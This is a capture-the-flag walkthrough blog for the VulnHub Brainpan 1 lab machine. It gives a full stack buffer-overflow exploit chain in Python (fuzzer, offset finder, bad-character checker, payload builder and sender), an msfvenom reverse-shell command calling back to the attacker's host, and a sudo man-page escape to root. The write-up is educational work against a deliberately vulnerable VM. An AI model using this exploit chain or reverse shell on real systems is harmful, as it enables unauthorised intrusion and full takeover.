**VulnHub-Brainpan: 1-Walkthrough**
Target machine: https://www.vulnhub.com/entry/brainpan-1,51/
Difficulty: Intermediate (CTF)
Release date: March 20, 2013
Description: By using this virtual machine, you agree that in no event will I be liable for any loss or damage, including without limitation indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of or in connection with the use of this software.
Objective: get root access and find flag.txt
Author: Dayu
Time: 2020-01-13
Note: All of these target machines are downloaded and run under VMware. I use Kali Linux as the attacker machine for solving the CTF. The techniques shown here are for learning and educational purposes only; if they are used for any other purpose, I take no responsibility.
First, information gathering
We need to identify the target VM's IP address; use nmap to find it:
Found the CTF target's IP address: 192.168.182.152
Ports 9999 and 10000 are open...
This one is different from the previous machines...
Try port 9999 first
It asks for a password and denies access... no luck... so try port 10000 instead
The earlier nmap scan showed port 10000 running an HTTP service
The page is mainly a Veracode secure-coding infographic listing the OWASP Top 10 web application vulnerabilities and so on; nothing useful so far...
Found a /bin directory; the response headers also reveal the specific HTTP server and Python version...
Use wget to download the brainpan.exe file; the file command shows it is a 32-bit Windows executable
Running the application on a Windows machine shows it is a network server waiting for connections on port 9999, so it is most likely the application listening on that port on the target...
Next, open brainpan.exe in Immunity Debugger on the local machine
Run it
Now create a simple Python fuzzer script that sends strings to try to crash the program...
Then run it from Kali against the EXE executing locally...
You can see the string from the Python script is sent successfully and triggers an access violation...
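A minimal fuzzer for this step, added here as an example (it is not the original post's script). The host, port and the 100-byte step size are assumptions; Brainpan prints a banner and asks for a password, so each probe reads the prompt, sends one line, and treats a reset, a timeout or an empty reply as the service having died.

```python
"""Added example: a length-stepping TCP fuzzer for a line-oriented service."""
import socket


def fuzz_lengths(start=100, step=100, limit=3000):
    """Probe lengths to try, e.g. 100, 200, ..., 3000 (assumed schedule)."""
    return list(range(start, limit + 1, step))


def fuzz(host, port, timeout=3.0):
    """Send growing 'A' strings; return the first length that broke the service.

    Returns None if every probe was accepted. A crash shows up either as a
    connection error / timeout on the probe that triggered it, or as an empty
    reply, or as a refused connection on the next probe.
    """
    for n in fuzz_lengths():
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.recv(1024)                       # banner / password prompt
                s.sendall(b"A" * n + b"\n")
                if not s.recv(1024):               # peer closed without answering
                    return n
        except (socket.timeout, ConnectionError, OSError):
            return n
    return None


if __name__ == "__main__":
    # Assumed target address from the walkthrough; adjust as needed.
    crash = fuzz("192.168.182.152", 9999)
    if crash is None:
        print("no crash up to", fuzz_lengths()[-1], "bytes")
    else:
        print("service died at", crash, "bytes")
```

The reported length is the first probe that was not acknowledged, so the real overflow point lies within one step of it; the exact offset is then pinned down with a cyclic pattern rather than by shrinking the step.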
Knowing that the string crashes the program, I want to determine exactly where it crashes and what overwrites EIP (in this case it is 61616161; ASCII lowercase 'a' is 0x61, so it represents aaaa). Replace the string in the Python script's payload with a string of unique characters...
To create a string of unique characters, use the Metasploit tool pattern_create to generate a unique 1000-character string...
Add it to the script as the payload...
Continue
Running it this time shows exactly where it crashes and what was used to overwrite EIP...
EIP has been overwritten with 35724134
We know these characters are somewhere in the 1000-character string; we need to know exactly where... use Metasploit (pattern_offset)...
It is at position 524; adjust the Python script accordingly...
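The offset can also be recovered without Metasploit. The following is an added example, not the post's own code: a Python reimplementation of the upper-lower-digit triplet scheme that pattern_create.rb uses, plus the reverse lookup. It takes the 35724134 value from the debugger above, reverses it to the ASCII bytes as they sit in memory (EIP is little-endian on x86), and searches the pattern.

```python
"""Added example: Metasploit-style cyclic pattern create/offset in Python."""
import string
import struct

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length):
    """Cyclic pattern Aa0Aa1Aa2...Aa9Ab0Ab1... cut to `length` characters."""
    out = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out.append(u + l + d)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]          # longest pattern is 20280 chars


def eip_to_chars(eip_hex):
    """Turn the debugger's EIP value (e.g. '35724134') into the 4 bytes as
    they were written to memory: pack the dword little-endian."""
    return struct.pack("<I", int(eip_hex, 16)).decode("ascii")


def pattern_offset(chars, length=1000):
    """Offset of the 4 ASCII chars in the pattern, or -1 if not present."""
    return pattern_create(length).find(chars)


if __name__ == "__main__":
    chars = eip_to_chars("35724134")                  # -> '4Ar5'
    print("EIP bytes in memory:", chars)
    print("offset:", pattern_offset(chars))           # -> 524
```

A -1 result means the value in EIP did not come from the pattern at all (for instance, it is a real code address or a partial overwrite), which is worth knowing before trusting an offset.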
Run it again
EIP is now overwritten with 62626262 (bbbb)...
Finally, the c's in the payload will be replaced with the shellcode...
Note: make sure the region is large enough to hold the reverse shell code, so the number of c's has to be adjusted!!
Right-click the ESP register and choose "Follow in Dump"; all the 'c' characters written to memory are visible. The start address is 005FF910
Scrolling down, the end address of the 'c' bytes is 005FFAE8
I wrote these the wrong way round here, but the meaning is clear... (awkward) 472 c's
If there were not enough characters here to hold the shellcode, the techniques from fuzzysecurity would be needed!
472 is enough here...
Now I need to check for "bad characters" that must not appear in my shellcode... I will use a string containing every distinct character...
Here is a simple Python script that generates all the characters...
Adjust the Python script's payload...
Run it again...
Looking carefully through the sequence, no characters are missing, so every character can be used (except the null byte \x00)
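Checking a 255-byte dump by eye is error-prone, so here is an added example (not the original post's script) that generates the bad-character string and compares it against the bytes read back from the debugger's memory dump. The dumps below are constructed: one with \x0a dropped, one with \x0d altered, and one truncated, to show the three ways a bad character typically shows up.

```python
"""Added example: generate the bad-char test string and diff it against a dump."""


def badchar_string(exclude=(0x00,)):
    """Every byte value except those already known to be bad (\x00 by default)."""
    return bytes(b for b in range(256) if b not in exclude)


def find_badchars(sent, dumped, window=4):
    """Return the sent bytes that are missing or altered in `dumped`.

    Walks both sequences in lock-step. On a mismatch the byte is flagged and
    the scan resyncs on the next expected byte within a short window, so an
    altered byte does not flag everything after it. If the copy was cut off
    (e.g. a terminator), every byte from the cut onward is reported.
    """
    bad = []
    j = 0
    for i, b in enumerate(sent):
        if j < len(dumped) and dumped[j] == b:
            j += 1
            continue
        bad.append(b)
        nxt = sent[i + 1] if i + 1 < len(sent) else None
        if nxt is not None:
            for k in range(j, min(j + window, len(dumped))):
                if dumped[k] == nxt:
                    j = k
                    break
    return bad


if __name__ == "__main__":
    sent = badchar_string()
    # constructed dumps standing in for what "Follow in Dump" would show
    dropped = sent.replace(b"\x0a", b"")
    altered = sent.replace(b"\x0d", b"\x00")
    truncated = sent[:127]
    for name, d in (("dropped", dropped), ("altered", altered), ("truncated", truncated)):
        print(name, [hex(b) for b in find_badchars(sent, d)][:4])
```

When a byte is found bad, add it to the exclude list, regenerate and send again: a second bad character can hide behind the corruption caused by the first, so one pass is rarely enough.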
To jump to the stack, I need the address of a "jmp esp" instruction...
311712F3...
Add it to my Python script in place of the 4 'b' characters written to EIP (reversed into little-endian format: \xF3\x12\x17\x31)
Use msfvenom to create my reverse shell payload...
Command: msfvenom -p linux/x86/shell_reverse_tcp -b "\x00" LHOST=192.168.182.149 LPORT=443 -f python
In the Python script, add the little-endian jmp esp address, 16 NOPs (\x90), and then the actual shellcode...
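The final buffer, assembled as an added example rather than the post's own exploit script: 524 bytes of padding, the jmp esp address packed little-endian, the 16-byte NOP sled, then the shellcode. It also enforces the two constraints established above, that the shellcode fits in the 472 bytes measured after ESP and that neither the address nor the shellcode contains the bad character \x00. The shellcode is a constructed stand-in of int3 (0xCC) breakpoints, useful for confirming in the debugger that execution lands in the sled; the msfvenom output replaces it for the real run. Host and port are assumptions from the walkthrough.

```python
"""Added example: assemble and sanity-check the Brainpan overflow buffer."""
import socket
import struct

OFFSET = 524                                  # bytes before EIP (pattern_offset)
JMP_ESP = 0x311712F3                          # "jmp esp" found in the debugger
NOP_SLED = b"\x90" * 16
SPACE_AFTER_ESP = 0x005FFAE8 - 0x005FF910     # 472 bytes of 'c' seen in the dump
BADCHARS = b"\x00"


def build_exploit(shellcode, offset=OFFSET, jmp_esp=JMP_ESP, nops=NOP_SLED,
                  space=SPACE_AFTER_ESP, badchars=BADCHARS):
    """Return the payload bytes, or raise ValueError if it cannot work."""
    eip = struct.pack("<I", jmp_esp)          # \xF3\x12\x17\x31 on the wire
    for name, blob in (("jmp esp address", eip), ("shellcode", shellcode)):
        hit = [hex(b) for b in badchars if b in blob]
        if hit:
            raise ValueError(f"{name} contains bad char(s): {hit}")
    needed = len(nops) + len(shellcode)
    if needed > space:
        raise ValueError(f"need {needed} bytes after ESP, only {space} available")
    return b"A" * offset + eip + nops + shellcode


def send_exploit(host, port, payload):
    """Deliver the payload as one line to the password prompt."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(1024)                          # banner / prompt
        s.sendall(payload + b"\n")


# Constructed stand-in shellcode: 95 int3 breakpoints. Replace with msfvenom output.
SHELLCODE = b"\xcc" * 95

if __name__ == "__main__":
    send_exploit("192.168.182.152", 9999, build_exploit(SHELLCODE))
```

Run it with the breakpoint stand-in while brainpan.exe is under the debugger: a break inside the sled proves the offset and the jmp esp address, independently of whether the shellcode itself works or the listener is reachable.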
First test the exploit locally by launching brainpan.exe under wine, then start the listener; the connection comes back!!
The exploit also works against the target machine (192.168.182.152); carry on testing...
Successfully got a shell through the buffer overflow...
Go straight for sudo privilege escalation; sudo -l shows /home/anansi/bin/anansi_util...
Try running it with sudo...
It means I can pick one of the options to execute; "command" tells me there are commands I can run, so let's try
The manual option drops into a man page...
Everything run from here executes with root privileges... (there are too many ways to escalate from this point; I won't write out every shell, I just noticed it's already 2 AM...)
Remember, I have been running the whole program under sudo (as root), so if I type !/bin/sh at the man page it spawns a shell from here... running as root! (Remember this method; it is simple and saves time and effort)
Got root and the flag...
I spent a day understanding buffer overflows, stack overflows, binaries and reverse analysis!!!! Before getting into it, it really seems hard, but once you study it seriously and understand the principles, it is actually not that difficult... (haha, easy to say now)
Debugging and writing a buffer overflow exploit requires understanding the principles of stack overflows, the debugging method, and how to build the exploit. Compared with proper reverse engineering this is fairly basic, but anyone without reverse-analysis experience still needs to study it carefully. Keep at it.
Since we have obtained root privileges and found flag.txt, this simple target machine is complete. I hope you like this machine; keep following, as there will be more challenging machines later, along with exercises to learn from.
If you have other methods, you are welcome to leave a comment. If anything is wrong, please tell me. If you think this blog is well written, please share it with the people around you.